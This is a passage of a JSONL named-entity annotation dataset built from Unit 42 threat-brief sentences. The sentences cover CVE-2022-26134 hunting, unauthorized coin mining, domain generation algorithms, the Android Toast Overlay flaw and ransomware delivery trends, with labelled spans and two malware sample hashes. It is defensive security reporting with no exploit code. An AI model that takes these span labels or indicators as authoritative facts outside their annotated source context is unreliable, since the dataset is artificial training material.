track any attempts to exploit CVE-2022-26134 across our customers, using Cortex XDR and the XQL queries below.","entities":[{"id":44737,"label":"vulnerability","start_offset":74,"end_offset":88},{"id":44738,"label":"vulnerability","start_offset":285,"end_offset":299},{"id":44739,"label":"SOFTWARE","start_offset":207,"end_offset":214},{"id":44740,"label":"SOFTWARE","start_offset":328,"end_offset":338},{"id":44741,"label":"SOFTWARE","start_offset":109,"end_offset":119},{"id":44742,"label":"SOFTWARE","start_offset":120,"end_offset":126},{"id":44743,"label":"tools","start_offset":180,"end_offset":190},{"id":44744,"label":"FILEPATH","start_offset":140,"end_offset":164},{"id":44745,"label":"tools","start_offset":347,"end_offset":350}],"relations":[],"Comments":[]} {"id":397,"text":" Palo Alto Networks provides protection against the exploitation of this vulnerability in the following ways: Additionally, Xpanse has the ability to identify and detect Atlassian Confluence Servers that may be a part of your attack surface or the attack surface of third-party partners connected to your organization.","entities":[{"id":46095,"label":"identity","start_offset":1,"end_offset":19},{"id":46096,"label":"SOFTWARE","start_offset":125,"end_offset":131},{"id":46097,"label":"SOFTWARE","start_offset":171,"end_offset":199}],"relations":[],"Comments":[]} {"id":398,"text":"Xpanse is even able to classify those servers which have not been upgraded to the most recent version.","entities":[{"id":46098,"label":"SOFTWARE","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":399,"text":"These abilities will be updated to detect additional instances or versions that are insecure against this CVE.","entities":[],"relations":[],"Comments":[]} {"id":400,"text":" Existing Xpanse customers can log into Expander and identify their enumerated Atlassian Confluence devices by filtering by “Atlassian Confluence Server” in the Services tab.","entities":[{"id":46099,"label":"SOFTWARE","start_offset":10,"end_offset":16},{"id":46101,"label":"SOFTWARE","start_offset":125,"end_offset":152},{"id":46100,"label":"SOFTWARE","start_offset":79,"end_offset":99}],"relations":[],"Comments":[]} {"id":401,"text":" As further information emerges or additional detections and protections are put into place, Palo Alto Networks will update this publication accordingly.","entities":[{"id":46102,"label":"identity","start_offset":93,"end_offset":111}],"relations":[],"Comments":[]} {"id":402,"text":" During the hunting process, we encountered exploitation attempts that originated from the following IP addresses: Updated June 13, 2022, at 5:30 a.m. PT.","entities":[{"id":44746,"label":"TIME","start_offset":123,"end_offset":153}],"relations":[],"Comments":[]} {"id":403,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":404,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":405,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":406,"text":"Overview ","entities":[],"relations":[],"Comments":[]} {"id":407,"text":"As shoppers and retailers gear up for the 2017 holiday season, they need to be aware of a new kind of cybersecurity threat they may face this year: unauthorized coin mining.","entities":[{"id":46104,"label":"attack-pattern","start_offset":148,"end_offset":172},{"id":46103,"label":"TIME","start_offset":42,"end_offset":61}],"relations":[],"Comments":[]} {"id":408,"text":" Unauthorized coin mining is a new threat that can affect retailers and shoppers in a way that could impact or even halt their online shopping experience.","entities":[{"id":44747,"label":"attack-pattern","start_offset":1,"end_offset":25}],"relations":[],"Comments":[]} {"id":409,"text":"A recent Unit 42 threat intelligence posting on the topic showed how 63 percent of the unauthorized coin mining sites we found came online in October 2017.","entities":[{"id":46105,"label":"identity","start_offset":9,"end_offset":16},{"id":46106,"label":"TIME","start_offset":142,"end_offset":154}],"relations":[],"Comments":[]} {"id":410,"text":" This surge in unauthorized coin mining is driven, in large part, by the recent skyrocketing in the value of digital currencies like bitcoin.","entities":[{"id":46107,"label":"SOFTWARE","start_offset":133,"end_offset":140},{"id":46108,"label":"attack-pattern","start_offset":15,"end_offset":39}],"relations":[],"Comments":[]} {"id":411,"text":"As that trend shows no sign of slowing down anytime soon, we can expect this to remain a very lucrative avenue for attackers.","entities":[],"relations":[],"Comments":[]} {"id":412,"text":" Unlike other cybersecurity threats we’re used to bracing for around the holiday season, unauthorized coin mining attacks can affect shoppers who are up-to-date with security patches and even some running some security protections.","entities":[{"id":46110,"label":"attack-pattern","start_offset":89,"end_offset":121}],"relations":[],"Comments":[]} {"id":413,"text":"And unlike spam or phishing, these attacks also don’t require any lapse in vigilance by the user: they can happen simply by going to websites users know and trust.","entities":[{"id":46111,"label":"attack-pattern","start_offset":11,"end_offset":15},{"id":46112,"label":"attack-pattern","start_offset":19,"end_offset":27}],"relations":[],"Comments":[]} {"id":414,"text":" The good news for retailers is that these attacks are wholly preventable.","entities":[],"relations":[],"Comments":[]} {"id":415,"text":"And for shoppers, the impact of a successful attack is minimal: there are no lasting effects or impact, making it an annoyance at worst. But because of the potential impact on holiday shopping and the ease of attacks, unauthorized coin mining is an attack that retailers need to be aware of and take active steps for prevention this holiday season.","entities":[{"id":46113,"label":"attack-pattern","start_offset":219,"end_offset":243}],"relations":[],"Comments":[]} {"id":416,"text":" What Is Unauthorized Coin Mining?","entities":[{"id":46114,"label":"attack-pattern","start_offset":9,"end_offset":33}],"relations":[],"Comments":[]} {"id":417,"text":" The best way to understand the threat of unauthorized coin mining is to first understand its impact.","entities":[{"id":46115,"label":"attack-pattern","start_offset":42,"end_offset":66}],"relations":[],"Comments":[]} {"id":418,"text":"Unauthorized coin mining is an attack that can cause a user’s system to suddenly and unexpectedly slow down, sometimes significantly, when visiting a website.","entities":[{"id":46116,"label":"attack-pattern","start_offset":0,"end_offset":24}],"relations":[],"Comments":[]} {"id":419,"text":"In a worst case, the slow-down can be so severe that it can make a website basically unusable.","entities":[],"relations":[],"Comments":[]} {"id":420,"text":" Obviously, this impact is potentially dire for shoppers and retailers as it directly impacts and harms the online shopping experience.","entities":[],"relations":[],"Comments":[]} {"id":421,"text":"What causes this impact is when the website the user visits is running “coin miner” code.","entities":[{"id":46117,"label":"malware","start_offset":72,"end_offset":82}],"relations":[],"Comments":[]} {"id":422,"text":" “Coin miner” code is code used to “mine” for digital currency like bitcoin.","entities":[{"id":46118,"label":"malware","start_offset":2,"end_offset":12},{"id":46119,"label":"SOFTWARE","start_offset":68,"end_offset":75}],"relations":[],"Comments":[]} {"id":423,"text":"Mining provides the computing necessary to power the digital currency’s infrastructure.","entities":[],"relations":[],"Comments":[]} {"id":424,"text":"Mining is also a computationally intensive process, meaning it takes a lot of system resources.","entities":[],"relations":[],"Comments":[]} {"id":425,"text":"Because of this, people can earn digital currency credit in exchange for the use of their computing resources to power that digital currency’s infrastructure.","entities":[],"relations":[],"Comments":[]} {"id":426,"text":" There are many kinds of coin mining software.","entities":[],"relations":[],"Comments":[]} {"id":427,"text":"In this case, we are concerned about coin mining code that’s used on websites.","entities":[],"relations":[],"Comments":[]} {"id":428,"text":"When the user visits the website, the code runs on their system and “mines” on behalf of others – either the website or someone else.","entities":[],"relations":[],"Comments":[]} {"id":429,"text":" When this is done with the visitor’s full knowledge and consent, it’s a fair and reasonable exchange.","entities":[],"relations":[],"Comments":[]} {"id":430,"text":"For instance, there are some websites that now use coin mining as an alternative to digital advertising to generate revenue.","entities":[],"relations":[],"Comments":[]} {"id":431,"text":"In these cases, the coin mining is authorized; the website informs the user that, while on the site, his or her computing resources will be used to “mine” digital currency, and the site will receive the credits.","entities":[],"relations":[],"Comments":[]} {"id":432,"text":"While the user will experience a slow-down as the coin mining software is run, it is (or should be) expected, because of the notification, and so done with the site visitor’s consent.","entities":[],"relations":[],"Comments":[]} {"id":433,"text":" Where this becomes a problem is when coin mining is done without the user’s knowledge and consent.","entities":[],"relations":[],"Comments":[]} {"id":434,"text":"In this case the coin mining is unauthorized: in essence, it’s an attack against the user’s resources.","entities":[],"relations":[],"Comments":[]} {"id":435,"text":" How Do Unauthorized Coin Mining Attacks Happen?","entities":[{"id":44748,"label":"attack-pattern","start_offset":8,"end_offset":32}],"relations":[],"Comments":[]} {"id":436,"text":" Unauthorized coin mining attacks happen very simply: the website the user is visiting has special code on it that performs coin mining operations on the visitor’s computer while they’re on the website.","entities":[{"id":46120,"label":"attack-pattern","start_offset":1,"end_offset":33}],"relations":[],"Comments":[]} {"id":437,"text":"And, as noted before, this happens without the user’s knowledge or consent.","entities":[],"relations":[],"Comments":[]} {"id":438,"text":" Because these attacks happen due to code on the website, that code is either there with the site owner’s knowledge and permission or not.","entities":[],"relations":[],"Comments":[]} {"id":439,"text":" When unauthorized coin mining happens with the site owner’s knowledge and permission, it’s basically a malicious site.","entities":[{"id":46121,"label":"attack-pattern","start_offset":6,"end_offset":30}],"relations":[],"Comments":[]} {"id":440,"text":"That site’s owner is the attacker.","entities":[],"relations":[],"Comments":[]} {"id":441,"text":"When we’re talking about online shopping, clearly there’s no threat here to the retailer: they’re the ones doing the attacking.","entities":[],"relations":[],"Comments":[]} {"id":442,"text":"And for the shopper, it means you’re on an untrustworthy site and so open to all manner of risks beyond just unauthorized coin mining.","entities":[{"id":46122,"label":"attack-pattern","start_offset":109,"end_offset":133}],"relations":[],"Comments":[]} {"id":443,"text":" The real, significant situation shoppers and retailers need to think about this season is when unauthorized coin mining code is on a site without that site owner’s knowledge and permission.","entities":[{"id":46123,"label":"attack-pattern","start_offset":96,"end_offset":120}],"relations":[],"Comments":[]} {"id":444,"text":"Here the site itself has been attacked, and the site owners are also victims.","entities":[],"relations":[],"Comments":[]} {"id":445,"text":"This is an attack against not just shoppers but the retailers operating online shopping sites.","entities":[],"relations":[],"Comments":[]} {"id":446,"text":" How You Can Prevent Unauthorized Coin Mining Attacks If you’re a shopper, there are three things you can do to protect yourself against unauthorized coin mining attacks this holiday season: If you’re a retailer, preventing unauthorized coin mining attacks comes down to focusing on two tasks, both of which you should be doing anyway: Finally, if you’re a legitimate website that has chosen to implement coin mining to raise funds from your visitors, you can ensure that your visitors don’t think you’re engaged in unauthorized coin mining by doing three things: Conclusion Working to prevent cybercrime threats during the holiday season has become a standard part of what shoppers and retailers do every year.","entities":[],"relations":[],"Comments":[]} {"id":447,"text":"This year, for the first time in many years, shoppers and retailers are facing a new threat, unauthorized coin mining, driven by the surge in digital currency prices.","entities":[],"relations":[],"Comments":[]} {"id":448,"text":" While this threat can have a clear, negative impact on retailers and shoppers, the good news is that this threat is easily preventable and poses no lasting harm to consumers.","entities":[],"relations":[],"Comments":[]} {"id":449,"text":" This is a case where forewarned is forearmed, and that forearming can result in effective prevention. Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":450,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":451,"text":"This post is also available in: 日本語 (Japanese) Intro ","entities":[],"relations":[],"Comments":[]} {"id":452,"text":"One of the most important “innovations” in malware in the past decade is what’s called a Domain Generation Algorithm (“DGA”)”.","entities":[],"relations":[],"Comments":[]} {"id":453,"text":"DGA is an automation technique that attackers use to make it harder for defenders to protect against attacks.","entities":[],"relations":[],"Comments":[]} {"id":454,"text":"While DGA has been in use for over 10 years now, it’s still a potent technique that has been a particular challenge for defenders to counter.","entities":[],"relations":[],"Comments":[]} {"id":455,"text":"Fortunately, there are emerging technologies now that can better counter DGAs.","entities":[],"relations":[],"Comments":[]} {"id":456,"text":" What is it?","entities":[],"relations":[],"Comments":[]} {"id":457,"text":" A Domain Generation Algorithm is a program that is designed to generate domain names in a particular fashion.","entities":[],"relations":[],"Comments":[]} {"id":458,"text":"Attackers developed DGAs so that malware can quickly generate a list of domains that it can use for the sites that give it instructions and receive information from the malware (usually referred to as “command and control” or C2).","entities":[],"relations":[],"Comments":[]} {"id":459,"text":" Attackers use DGA so that they can quickly switch the domains that they’re using for the malware attacks.","entities":[],"relations":[],"Comments":[]} {"id":460,"text":"Attackers do this because security software and vendors act quickly to block and take down malicious domains that malware uses.","entities":[],"relations":[],"Comments":[]} {"id":461,"text":"Attackers developed DGA specifically to counter these actions.","entities":[],"relations":[],"Comments":[]} {"id":462,"text":" In the past, attackers would maintain a static list of malicious domains; defenders could easily take that list and start blocking and taking down those sites.","entities":[],"relations":[],"Comments":[]} {"id":463,"text":"By using an algorithm to build the list of domains, the attackers also make it harder for defenders to know or predict what domains will be used than if they had a simple list of domains.","entities":[],"relations":[],"Comments":[]} {"id":464,"text":"To get that list of domains that the malware will use, defenders have to decode the algorithm which can be difficult.","entities":[],"relations":[],"Comments":[]} {"id":465,"text":" Even then, taking down sites that malware using a DGA can be a challenge as defenders have to go through the process of working with ISPs to take down these malicious domains one by one.","entities":[{"id":46124,"label":"identity","start_offset":134,"end_offset":137}],"relations":[],"Comments":[]} {"id":466,"text":"Many DGAs are built to use hundreds or even thousands of domains.","entities":[],"relations":[],"Comments":[]} {"id":467,"text":"And these domains are often up for only limited periods of time.","entities":[],"relations":[],"Comments":[]} {"id":468,"text":"In this environment blocking and taking down DGA-related domains quickly becomes a game of “whack a mole” that is sometimes futile.","entities":[],"relations":[],"Comments":[]} {"id":469,"text":" Why should I care, what can it do to me?","entities":[],"relations":[],"Comments":[]} {"id":470,"text":" DGA by itself can’t harm you.","entities":[],"relations":[],"Comments":[]} {"id":471,"text":"But it is an important piece that enables modern malware to try and evade security products and countermeasures.","entities":[],"relations":[],"Comments":[]} {"id":472,"text":"The importance and usefulness of DGA is best shown by the fact that it’s been in regular and constant use since at least 2008.","entities":[{"id":46125,"label":"TIME","start_offset":121,"end_offset":125}],"relations":[],"Comments":[]} {"id":473,"text":"DGA was a key component in the Conficker attacks in 2008 and 2009 and part of its success.","entities":[{"id":46126,"label":"malware","start_offset":31,"end_offset":40},{"id":46127,"label":"TIME","start_offset":52,"end_offset":56},{"id":46128,"label":"TIME","start_offset":61,"end_offset":65}],"relations":[],"Comments":[]} {"id":474,"text":" What can I do about it?","entities":[],"relations":[],"Comments":[]} {"id":475,"text":" Because DGA is a technique the fuels malware attacks, the things you can do to help prevent malware can also help prevent DGA-fueled malware attacks: In addition, new technologies are being developed that can more directly counter DGA-fueled attacks, particularly for organizations.","entities":[],"relations":[],"Comments":[]} {"id":476,"text":"In particular, security vendors are bringing automation to bear to counter the attackers’ automation.","entities":[],"relations":[],"Comments":[]} {"id":477,"text":"New anti-DGA technologies that leverage machine learning and big data are capable of countering DGA’s automation with automated prediction of their own that can anticipate, block, assist with malicious site takedowns or even, in some cases, prevent those malicious sites from being used in the first place.","entities":[],"relations":[],"Comments":[]} {"id":478,"text":" You can also learn more about these new technologies and look at deploying them as an additional layer of protection. ","entities":[],"relations":[],"Comments":[]} {"id":479,"text":"About: Threat Briefs are meant to help busy people understand real-world threats and how they can prevent them in their lives.","entities":[],"relations":[],"Comments":[]} {"id":480,"text":" They’re put together by Palo Alto Networks Unit 42 threat research team and are meant for you to read and share with your family, friends, and coworkers so you can all be safer and get on with the business of your digital life. Got a topic you want us to write about for you, your friends, or your family?","entities":[{"id":45787,"label":"identity","start_offset":25,"end_offset":43},{"id":45789,"label":"identity","start_offset":44,"end_offset":51},{"id":45790,"label":"identity","start_offset":25,"end_offset":72}],"relations":[],"Comments":[]} {"id":481,"text":"Email us at u42comms@paloaltonetworks.com.","entities":[{"id":1630,"label":"EMAIL","start_offset":12,"end_offset":41}],"relations":[],"Comments":[]} {"id":482,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":483,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":484,"text":" By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":485,"text":"Unit 42 released details about a vulnerability that affects Android devices running operating systems older than 8.0 Oreo.","entities":[{"id":1635,"label":"identity","start_offset":0,"end_offset":7},{"id":46129,"label":"SOFTWARE","start_offset":60,"end_offset":67},{"id":46130,"label":"SOFTWARE","start_offset":113,"end_offset":121}],"relations":[],"Comments":[]} {"id":486,"text":"The vulnerability leaves Android users at risk of falling victim to an Android Toast Overlay attack.","entities":[{"id":44751,"label":"SOFTWARE","start_offset":25,"end_offset":32},{"id":44753,"label":"attack-pattern","start_offset":71,"end_offset":99}],"relations":[{"id":155,"from_id":44753,"to_id":44751,"type":"targets"}],"Comments":[]} {"id":487,"text":"Patches are available that fix this vulnerability, so Android users should get the latest updates as soon as possible.","entities":[{"id":46131,"label":"SOFTWARE","start_offset":54,"end_offset":61}],"relations":[],"Comments":[]} {"id":488,"text":" How it Works ","entities":[],"relations":[],"Comments":[]} {"id":489,"text":"The vulnerability affects the Toast feature on Android devices, an Android feature that allows display messages and notifications of other applications to “pop up,” and allows an attacker to employ an overlay attack.","entities":[{"id":45791,"label":"SOFTWARE","start_offset":47,"end_offset":54},{"id":45792,"label":"SOFTWARE","start_offset":67,"end_offset":74}],"relations":[],"Comments":[]} {"id":490,"text":" An overlay attack happens when an attacker places a window over a legitimate application on the device.","entities":[],"relations":[],"Comments":[]} {"id":491,"text":"Users will interact with the window, thinking they are performing their intended function, but they are actually engaging with the attackers overlay window and executing the attacker’s desired function.","entities":[],"relations":[],"Comments":[]} {"id":492,"text":"You can see an example of how this would work in Figure 1.","entities":[],"relations":[],"Comments":[]} {"id":493,"text":" Figure 1: Bogus patch installer overlying malware requesting administrative permissions This interaction can install malware or malicious software on the device, grant malware full administrative privileges or lock the user out and render the device unusable. In the past successful overlay attacks were typically dependent on two conditions: However, with this particular vulnerability, these conditions are no longer required for a successful attack.","entities":[],"relations":[],"Comments":[]} {"id":494,"text":"This means that attackers can use this vulnerability in apps users get from places other than Google Play.","entities":[{"id":46132,"label":"SOFTWARE","start_offset":94,"end_offset":105}],"relations":[],"Comments":[]} {"id":495,"text":"And when they install these malicious apps, they don’t have to ask for the “draw on top” permission.","entities":[],"relations":[],"Comments":[]} {"id":496,"text":" How to Defend Against It Keeping devices updated is a general security best practice.","entities":[],"relations":[],"Comments":[]} {"id":497,"text":"The Android Toast Overlay attack specifically targets outdated devices using versions prior to 8.0.","entities":[{"id":46133,"label":"attack-pattern","start_offset":4,"end_offset":32}],"relations":[],"Comments":[]} {"id":498,"text":"In order to defend against the Android Toast Overlay attack, update all Android devices to the latest version.","entities":[{"id":44756,"label":"attack-pattern","start_offset":31,"end_offset":59},{"id":44757,"label":"SOFTWARE","start_offset":31,"end_offset":38},{"id":44758,"label":"SOFTWARE","start_offset":72,"end_offset":79}],"relations":[],"Comments":[]} {"id":499,"text":"Additionally, avoid downloading malicious applications by only downloading from the Google Play store is another best practice you should always follow.","entities":[{"id":46134,"label":"SOFTWARE","start_offset":84,"end_offset":101}],"relations":[],"Comments":[]} {"id":500,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":501,"text":" Please mark, I'm not a robot! ","entities":[],"relations":[],"Comments":[]} {"id":502,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":503,"text":"This post is also available in: 日本語 (Japanese) Ransomware is one of the top threats in cybersecurity and a focus area for Palo Alto Networks.","entities":[{"id":46135,"label":"identity","start_offset":128,"end_offset":146}],"relations":[],"Comments":[]} {"id":504,"text":"In the current threat landscape, ransom payments are rising and organizations are seeking to protect themselves from threat actors.","entities":[],"relations":[],"Comments":[]} {"id":505,"text":"In the 2021 Unit 42 Ransomware Threat Report, we detailed the observations and the trend of top ransomware families from January 2020-January 2021.","entities":[{"id":1681,"label":"identity","start_offset":12,"end_offset":19},{"id":46138,"label":"TIME","start_offset":134,"end_offset":146},{"id":46136,"label":"TIME","start_offset":7,"end_offset":11},{"id":46137,"label":"TIME","start_offset":121,"end_offset":133}],"relations":[],"Comments":[]} {"id":506,"text":"This post supplements that information based on observations from the first three months of 2021, and will discuss the propagation of different ransomware families we observed in the wild and the different types of extortion used.","entities":[{"id":46139,"label":"TIME","start_offset":92,"end_offset":96}],"relations":[],"Comments":[]} {"id":507,"text":"We hope the information will help readers get a clear picture of current directions in ransomware trends.","entities":[],"relations":[],"Comments":[]} {"id":508,"text":"In the first quarter (Q1) of 2021, Unit 42 detected 113 different ransomware families in the wild.","entities":[{"id":46140,"label":"TIME","start_offset":21,"end_offset":33},{"id":46141,"label":"identity","start_offset":35,"end_offset":42}],"relations":[],"Comments":[]} {"id":509,"text":"Based on the statistical data, the top 15 ransomware families only cover 52.3% of total ransomware cases.","entities":[],"relations":[],"Comments":[]} {"id":510,"text":"This demonstrates the diversity of ransomware and emphasizes how difficult it is to expand ransomware detection coverage with static profiling.","entities":[],"relations":[],"Comments":[]} {"id":511,"text":"Figure 1 shows the proportion of ransomware sample numbers for different families that Unit 42 detected in the wild.","entities":[{"id":46142,"label":"identity","start_offset":87,"end_offset":94}],"relations":[],"Comments":[]} {"id":512,"text":"Among all, 6.7% of the ransomware samples are Virlock, which has been active since 2014.","entities":[{"id":46143,"label":"malware","start_offset":46,"end_offset":53},{"id":46144,"label":"TIME","start_offset":83,"end_offset":87}],"relations":[],"Comments":[]} {"id":513,"text":"Virlock has the largest number of variants due to its file-infector-like behavior.","entities":[{"id":46145,"label":"attack-pattern","start_offset":54,"end_offset":81},{"id":44760,"label":"malware","start_offset":0,"end_offset":7}],"relations":[{"id":159,"from_id":44760,"to_id":46145,"type":"uses"}],"Comments":[]} {"id":514,"text":" Higher malware variant numbers don't necessarily imply a higher prevalence.","entities":[],"relations":[],"Comments":[]} {"id":515,"text":"Some ransomware families don’t deliver different variants every time, but the infection ratio per sample is high, meaning attackers delivered the same malware to huge numbers of victims.","entities":[],"relations":[],"Comments":[]} {"id":516,"text":"Figure 2 shows a completely different result from Figure 1 and stems from only counting ransomware samples from cases in which more than five hosts were infected with the same malware.","entities":[],"relations":[],"Comments":[]} {"id":517,"text":"From this lens, the top three families observed are Ryuk (31.7%), Sodinokibi (20%) and Maze (15%). Emails are still the most efficient method to deliver and propagate ransomware.","entities":[{"id":46146,"label":"malware","start_offset":52,"end_offset":56},{"id":46147,"label":"malware","start_offset":66,"end_offset":76},{"id":46148,"label":"malware","start_offset":87,"end_offset":91}],"relations":[],"Comments":[]} {"id":518,"text":"Figure 3 shows ransomware arrives via different application protocols.","entities":[],"relations":[],"Comments":[]} {"id":519,"text":"The majority of ransomware is delivered by email.","entities":[{"id":44761,"label":"attack-pattern","start_offset":16,"end_offset":48}],"relations":[],"Comments":[]} {"id":520,"text":"Web browsing is the second most common entry vector for ransomware infections.","entities":[],"relations":[],"Comments":[]} {"id":521,"text":"The process of delivering malware by a URL can include various techniques.","entities":[],"relations":[],"Comments":[]} {"id":522,"text":"For example, the URL links can be posted on forums or chat group software, sent by IM applications, offered via fake freeware for download or attached in emails.","entities":[{"id":45793,"label":"attack-pattern","start_offset":112,"end_offset":125},{"id":46149,"label":"attack-pattern","start_offset":142,"end_offset":160}],"relations":[],"Comments":[]} {"id":523,"text":"Web hosting ransomware can also be downloaded and successfully installed through a multi-layered infection chain among different file types.","entities":[{"id":46150,"label":"attack-pattern","start_offset":0,"end_offset":22}],"relations":[],"Comments":[]} {"id":524,"text":"For example, AlumniLocker is first delivered as a phishing PDF.","entities":[{"id":46151,"label":"malware","start_offset":13,"end_offset":25},{"id":46152,"label":"attack-pattern","start_offset":50,"end_offset":62}],"relations":[],"Comments":[]} {"id":525,"text":"It leads to downloading a ZIP archive that contains an LNK downloader.","entities":[{"id":44763,"label":"SOFTWARE","start_offset":26,"end_offset":29},{"id":44764,"label":"attack-pattern","start_offset":55,"end_offset":69}],"relations":[],"Comments":[]} {"id":526,"text":"This downloads and executes an obfuscated PowerShell script to finally install the ransomware.","entities":[{"id":46153,"label":"attack-pattern","start_offset":42,"end_offset":59}],"relations":[],"Comments":[]} {"id":527,"text":" Figure 4 breaks down which file types we saw in the course of ransomware detection and their prevalence.","entities":[],"relations":[],"Comments":[]} {"id":528,"text":"32-bit EXE is the most common ransomware file type we observed.","entities":[],"relations":[],"Comments":[]} {"id":529,"text":"Other file types are often used as the first stage of infection or downloaders, such as archives, documents and scripts.","entities":[],"relations":[],"Comments":[]} {"id":530,"text":"Most ransomware is delivered via email with an attached archive; the ransomware is compressed in the archived files with or without password protection.","entities":[],"relations":[],"Comments":[]} {"id":531,"text":"“Resume” or “portfolio document” are examples of archive file names, and the archive contains one or more pieces of malware with fake document file icons.","entities":[],"relations":[],"Comments":[]} {"id":532,"text":"One example here is Makop, contained in a 7z archive along with an infostealer malware (SHA256: DE6DFA018773E07C218EF1DF62CE0D99A708841BF1DDFB4C6AD7E323D5D666A4).","entities":[{"id":1760,"label":"malware","start_offset":67,"end_offset":78},{"id":1761,"label":"SHA2","start_offset":96,"end_offset":160},{"id":46154,"label":"tools","start_offset":42,"end_offset":44}],"relations":[{"id":156,"from_id":1761,"to_id":1760,"type":"related-to"}],"Comments":[]} {"id":533,"text":"A script file is also used to download or install ransomware.","entities":[],"relations":[],"Comments":[]} {"id":534,"text":"For example, GandCrab uses JScript as a downloader, leveraging Windows Background Intelligent Transfer Service (BITS) to download the payload in the background (Figure 5).","entities":[{"id":44765,"label":"malware","start_offset":13,"end_offset":21},{"id":44766,"label":"tools","start_offset":63,"end_offset":117}],"relations":[{"id":20,"from_id":44765,"to_id":44766,"type":"uses"}],"Comments":[]} {"id":535,"text":"We also observed that Mailto (AKA NetWalker) tends to deliver ransomware in a highly obfuscated PowerShell script.","entities":[{"id":1765,"label":"malware","start_offset":22,"end_offset":28},{"id":1766,"label":"malware","start_offset":34,"end_offset":43},{"id":46155,"label":"attack-pattern","start_offset":78,"end_offset":113}],"relations":[{"id":162,"from_id":1766,"to_id":1765,"type":"duplicate-of"},{"id":160,"from_id":46155,"to_id":1766,"type":"delivers"},{"id":161,"from_id":46155,"to_id":1765,"type":"delivers"}],"Comments":[]} {"id":536,"text":"Exploit documents are seldom seen for delivering ransomware.","entities":[],"relations":[],"Comments":[]} {"id":537,"text":"One example is an exploit RTF that led to downloading and installing Makop ransomware remotely.","entities":[{"id":44767,"label":"attack-pattern","start_offset":18,"end_offset":29},{"id":44768,"label":"malware","start_offset":69,"end_offset":85}],"relations":[{"id":21,"from_id":44767,"to_id":44768,"type":"delivers"}],"Comments":[]} {"id":538,"text":" Besides encrypting files on infected hosts, the main feature of ransomware is, of course, the demand for ransom.","entities":[],"relations":[],"Comments":[]} {"id":539,"text":"Since ransomware threat actors have had years to evolve their techniques, there are now several different ways for attackers to receive payments and provide the \"service\" they claim to offer.","entities":[],"relations":[],"Comments":[]} {"id":540,"text":"Usually, after the ransomware successfully installs, it pops up a message box or leaves text files to explain how to pay the ransom – the ransom note.","entities":[],"relations":[],"Comments":[]} {"id":541,"text":"Some ransomware locks the victim's screen and only displays the ransom note.","entities":[],"relations":[],"Comments":[]} {"id":542,"text":" Unit 42 has reviewed ransom notes from different ransomware families.","entities":[{"id":46156,"label":"identity","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} {"id":543,"text":"Most ransom notes request payment in cryptocurrency or mention reaching out via the darknet, though some other contact methods also appear. In these cases, the ransom note asks victims to pay a specific amount in cryptocurrency – Bitcoin (BTC), Monero (XMR), etc. — to a specific wallet address.","entities":[{"id":45794,"label":"SOFTWARE","start_offset":246,"end_offset":252},{"id":44769,"label":"SOFTWARE","start_offset":231,"end_offset":238},{"id":44770,"label":"SOFTWARE","start_offset":231,"end_offset":244},{"id":44772,"label":"SOFTWARE","start_offset":246,"end_offset":258}],"relations":[],"Comments":[]} {"id":544,"text":"Two ransomware families that utilize these types of ransom notes are Virlock and WanaCrypt0r.","entities":[{"id":46157,"label":"malware","start_offset":69,"end_offset":76},{"id":46158,"label":"malware","start_offset":81,"end_offset":92}],"relations":[],"Comments":[]} {"id":545,"text":" Some ransomware families, including Babuk, Sodinokibi, Cerber, Mailto, Ryuk and others, seldom show the ransom amount or cryptocurrency wallet address.","entities":[{"id":46160,"label":"malware","start_offset":44,"end_offset":54},{"id":46159,"label":"malware","start_offset":37,"end_offset":42},{"id":46161,"label":"malware","start_offset":56,"end_offset":62},{"id":46163,"label":"malware","start_offset":72,"end_offset":76},{"id":46162,"label":"malware","start_offset":64,"end_offset":70}],"relations":[],"Comments":[]} {"id":546,"text":"Instead, they instruct victims to install TOR and reach out to them on the darknet.","entities":[{"id":44773,"label":"tools","start_offset":42,"end_offset":45}],"relations":[],"Comments":[]} {"id":547,"text":"Usually, they host a website for victims to input the identification key found in the ransom note, upload encrypted files for decryption – and pay the ransom.","entities":[],"relations":[],"Comments":[]} {"id":548,"text":" Ransom notes from Makop, Dharma, Ryuk, DearCry and others, sometimes ask victims to reach out to them via email.","entities":[{"id":46164,"label":"malware","start_offset":19,"end_offset":24},{"id":46166,"label":"malware","start_offset":34,"end_offset":38},{"id":46167,"label":"malware","start_offset":40,"end_offset":47},{"id":46165,"label":"malware","start_offset":26,"end_offset":32}],"relations":[],"Comments":[]} {"id":549,"text":"The email addresses given are usually from untraceable email accounts.","entities":[],"relations":[],"Comments":[]} {"id":550,"text":"At other times, a threat actor lets the victim chat with them directly on group chat software.","entities":[],"relations":[],"Comments":[]} {"id":551,"text":"The victims can find the threat actor’s user name through specific group chat software or follow a chat group link in the ransom note. Ransom payment operations are complicated and highly automated processes.","entities":[],"relations":[],"Comments":[]} {"id":552,"text":"Attackers can create a lot of cryptocurrency wallets automatically; they can even make a unique wallet address for each victim.","entities":[],"relations":[],"Comments":[]} {"id":553,"text":"Once a ransom is received, the ransom will be involved in the multiple transactions that are managed to distribute and aggregate the ransom across thousands of virtual wallets.","entities":[],"relations":[],"Comments":[]} {"id":554,"text":"For example, the Xorist ransomware (SHA256: 4979A10B81C41ECC0FC3A0F376ADE766CE616D2301639F74E0277047CC40E3D6) demanded £1,000 for a ransom; the bitcoin wallet address was 